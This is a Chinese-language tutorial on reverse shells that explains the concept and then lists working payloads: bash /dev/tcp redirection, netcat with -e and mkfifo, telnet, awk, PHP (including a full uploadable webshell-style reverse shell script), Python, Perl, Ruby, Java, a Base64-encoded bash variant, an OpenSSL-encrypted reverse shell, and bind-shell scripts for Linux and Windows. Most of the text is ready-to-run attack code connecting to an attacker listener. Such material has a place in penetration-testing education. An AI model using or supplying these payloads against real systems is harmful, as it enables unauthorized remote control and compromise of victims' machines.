反弹Shell原理与实现

反弹Shell原理与实现

一、理解反弹Shell
1、为什么需要反弹Shell?

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标IP: 目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,Web服务,SSH,SMB等等,都是正向连接。

那么什么情况下正向连接不太好用了呢?

(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。它的IP会动态改变,你不能持续控制。
(2)由于防火墙或局域网等限制,对方机器只能发送请求,不能主动接收请求。
(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

那么反弹就很好理解了, 攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

2、反弹Shell的基本原理

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

二、常用的反弹Shell命令
1、使用Bash进行反弹

Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。

(1)在Windows上启动端口监听

C:\Users\Denny>nc -lvp 4444
listening on [any] 4444 ...
# 参数 l 代表入站,v 代表输出信息级别,p 指定监听的端口,具体的参数解释可直接 nc -h 查看
# 端口可以是任意端口,只要不被防火墙阻挡并且没有被占用就行,比如80,443等

(2)在Linux上运行反弹命令:

bash -i >& /dev/tcp/192.168.112.1/4444 0>&1 
    
bash -i       # 打开一个交互的bash
>&           # 将标准错误输出合并并重定向到标准输出,也可以写成 &> 
    
/dev/tcp/192.168.112.1/4444       #意为调用socket,建立socket连接,其中192.168.112.1为要反弹到的主机IP,4444为端口
    
0>&1          # 标准输入重定向到标准输出,实现你与反弹出来的shell的交互,可以接受用户输入,0>&1 和 0<&1 是相同的作用
    
/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
    
在 bash 命令执行的过程中,主要有三种输出入的状况,分别是:
1. 标准输入:代码为 0 ;或称为 stdin ;使用的方式为 <
2. 标准输出:代码为 1 ;或称为 stdout;使用的方式为 1>
3. 错误输出:代码为 2 ;或称为 stderr;使用的方式为 2>

(3)反弹成功后在Windows上执行命令

C:\Users\Denny>nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.112.1] from 192.168.112.188 [192.168.112.188] 60436
root@centqiang:[?1034h[root@centqiang ~]#
root@centqiang:~[root@centqiang ~]# uname -a
uname -a
Linux centqiang 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@centqiang:~[root@ ~]#

直接将Windows上的反弹Shell结束,Linux的进程也相应退出。

2、使用exec执行Shell的方式
exec 5<> /dev/tcp/192.168.112.1/4444; cat <&5 | while read line; do $line 2>&5 >&5; done

# 注意此时在Windows端没有提示符,直接运行命令
3、其他方式
exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/192.168.112.1/4444; sh <&196 >&196 2>&196
4、使用nc进行反弹

要实现监听,先需要确保在Linux上已经成功安装nc,使用 yum install nc 完成安装。Kali上自带nc,可以直接使用。

(1)在Kali上启动nc监听

nc -lvp 4444

(2)在CentOS上反弹

nc -e /bin/bash 192.168.112.148 4444

当然,也可以直接反弹到Windows,原理是一样的。某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.112.1 4444 >/tmp/f
5、使用telnet进行反弹

(1)在攻击机上启动两个端口,一个用来输入,一个用来输出

nc -lvp 4444

nc -lvp 5555

(2)在目标机上启动反弹

telnet 192.168.112.1 4444 | /bin/bash | telnet 192.168.112.1 5555

默认情况下,CentOS没有自带telnet,直接yum install telnet安装即可,Kali内置。

6、使用awk进行反弹
awk 'BEGIN{s="/inet/tcp/0/192.168.112.1/4444";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
三、基于编程语言反弹Shell
1、基于PHP的反弹

如果PHP没有在环境变量中,则指定PHP的绝对路径即可。

php -r '$sock=fsockopen("192.168.112.1", 4444); exec("/bin/sh -i <&3 >&3 2>&3");'

上面的常规方法有个问题,如果在 webshell 里执行如上代码的话,会把系统的标准输入输出重定向到 /bin/sh 里,导致php-fpm直接502,然后弹的shell也会瞬间掉了,这个方式比较粗鲁。我们在运用中只希望新创建的进程(/bin/sh)的标准输入输出重定向到socket中,不去动系统的东西。改进后的代码如下:

php -r '$sock=fsockopen("192.168.112.1", 4444);$descriptorspec = array(0 => $sock,1 => $sock,2 => $sock);$process = proc_open("/bin/sh", $descriptorspec, $pipes);proc_close($process);'

也可以使用更为简单的脚本


system("bash -c 'bash -i >& /dev/tcp/192.168.112.1/4444 0>&1'");
?>

如果上传的木马无法反弹时,可以上传以下脚本(Windows和Linux通用),当通过浏览器访问该PHP页面时,实现反弹:

 
error_reporting (E_ERROR);
ignore_user_abort(true);
ini_set('max_execution_time',0);
$os = substr(PHP_OS,0,3);
$ipaddr = '192.168.112.1';
$port = '4444';
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()."\n------------Code by Spider-------------\n";
if($os == 'WIN') {
    $env = array('path' => 'c:\\windows\\system32');
} else {
    $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
if(function_exists('fsockopen')) {
    $sock = fsockopen($ipaddr,$port);
    fwrite($sock,$msg);
    while ($cmd = fread($sock,1024)) {
        if (substr($cmd,0,3) == 'cd ') {
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
        }
        if (trim(strtolower($cmd)) == 'exit') {
            break;
        } else {
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) {
                fwrite($pipes[0],$cmd);
                fclose($pipes[0]);
                $msg = stream_get_contents($pipes[1]);
                fwrite($sock,$msg);
                fclose($pipes[1]);
                $msg = stream_get_contents($pipes[2]);
                fwrite($sock,$msg);
                fclose($pipes[2]);
                proc_close($process);
            }
        }
    }
    fclose($sock);
} else {
    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
    socket_connect($sock,$ipaddr,$port);
    socket_write($sock,$msg);
    fwrite($sock,$msg);
    while ($cmd = socket_read($sock,1024)) {
        if (substr($cmd,0,3) == 'cd ') {
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
        }
        if (trim(strtolower($cmd)) == 'exit') {
            break;
        } else {
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) {
                fwrite($pipes[0],$cmd);
                fclose($pipes[0]);
                $msg = stream_get_contents($pipes[1]);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes[1]);
                $msg = stream_get_contents($pipes[2]);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes[2]);
                proc_close($process);
            }
        }
    }
    socket_close($sock);
}
?>
2、基于Python实现反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

新建一个socket,并将0、1、2分别代表系统的stdin、stdout、stderr(标准输入、输出、错误)重定向到socket中,然后开启一个shell。这样我们从socket中传来的命令就会进入系统的标准输入(就跟键盘输入的效果一样了),系统的输出和错误就会重定向到socket中,被我们客户端获取。但这个弹shell脚本只能在linux下使用。

利用以下Python代码可以开启一个本地交互式终端:

python -c 'import pty; pty.spawn("/bin/bash")'
3、基于Perl实现反弹

(1)基于/bin/sh反弹

perl -e 'use Socket;$i="192.168.112.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

(2)不依赖于/bin/bash的反弹

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.112.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
4、基于Ruby实现反弹
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.112.1","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

在Windows环境下使用:

ruby -rsocket -e 'c=TCPSocket.new("192.168.112.188","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
5、基于Java实现反弹
public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.112.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

将上述偌复制到目标主机中,并且必须命名为:Revs.java (文件名必须与类名相同),再运行以下两条命令实现反弹

javac Revs.java   # 编译源代码
java Revs          # 执行程序
6、基于Base64编码实现反弹
bash -i >& /dev/tcp/192.168.112.1/4444 0>&1  ==>
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMi4xLzQ0NDQgMD4mMQ==
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMi4xLzQ0NDQgMD4mMQ== | base64 -d | bash
四、加密反弹Shell
1、在攻击机上生成证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

然后输入证书信息,国家代码输入cn,其他随意
2、在攻击机上监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
3、在目标机上执行反弹
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.112.188:4444 > /tmp/s;rm /tmp/s
五、正向连接脚本
1、Linux下的正向连接

在目标主机上创建一个Python脚本,命名为:bind_conn.py

from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('192.168.112.188',5555))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
                stdout=talk, stderr=talk, shell=True)

在目标主机上执行上述代码,确保正常运行(python bind_conn.py)。然后在攻击主机上使用nc进行正向连接

nc 192.168.112.188 5555
2、Windows下的正向连接
from socket import *
import subprocess
import os, threading
def send(talk, proc):
        import time
        while True:
                msg = proc.stdout.readline()
                talk.send(msg)
if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('192.168.112.1', 5555))
        server.listen(5)
        print('waiting for connect')
        talk, addr = server.accept()
        print('connect from',addr)
        proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE, 
                stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        t = threading.Thread(target = send, args = (talk, proc))
        t.setDaemon(True)
        t.start()
        while True:
                cmd=talk.recv(1024)
                proc.stdin.write(cmd)
                proc.stdin.flush()
        server.close()

对于print函数来说,Python3中需要加圆括号,而Python2中不需要,如果存在版本上的小差异,进行调试确认即可。

你可能感兴趣的:(网络安全,linux,渗透测试,linux,bash,运维)